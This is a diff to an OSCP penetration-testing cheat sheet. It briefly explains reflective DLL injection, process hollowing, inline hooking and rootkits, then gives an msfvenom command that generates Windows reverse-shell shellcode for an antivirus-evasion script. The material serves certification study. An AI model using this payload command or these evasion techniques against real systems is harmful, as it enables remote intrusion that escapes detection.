peterkhe1999/CheatSheet/OSCP/README.md

 - **Reflective DLL Injection** technique attempts to load a DLL stored by the attacker in the process memory.
 The main challenge is that **LoadLibrary** does not support loading a DLL from memory.
 Attackers must write their own version of the API that does not rely on a disk-based DLL.

-- **Process Hollowing**, first launch a non-malicious process in a suspended state.
+- **Process Hollowing**: first launch a non-malicious process in a suspended state.
 Once launched, the image of the process is removed from memory and replaced with a malicious executable image.
 Finally, the process is then resumed and malicious code is executed instead of the legitimate process.

 - **Inline hooking** involves modifying memory and introducing a hook (an instruction that redirects the code execution) into a function to make it point to our malicious code.
 Upon executing our malicious code, the flow will return back to the modified function and resume execution, appearing as if only the original code had executed.
 Hooking is a technique often employed by **rootkits**.

-Rootkits aim to provide the malware author dedicated and persistent access to the target system through modification of system components in user space, kernel, or even at lower OS protection rings such as boot or hypervisor.
-Since rootkits need administrative privileges to implant its hooks, it is often installed from an elevated shell or by exploiting a privilege-escalation vulnerability.
+Rootkits aim to provide dedicated and persistent access to the target system through modification of system components in user space, kernel, or even at lower OS protection rings such as boot or hypervisor.
+Since rootkits need administrative privileges to implant its hooks, it is often installed from an elevated shell.

 ## Evading AV with Thread Injection

 Shellcode for `bypass.ps1` script

 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f powershell -v sc
 ```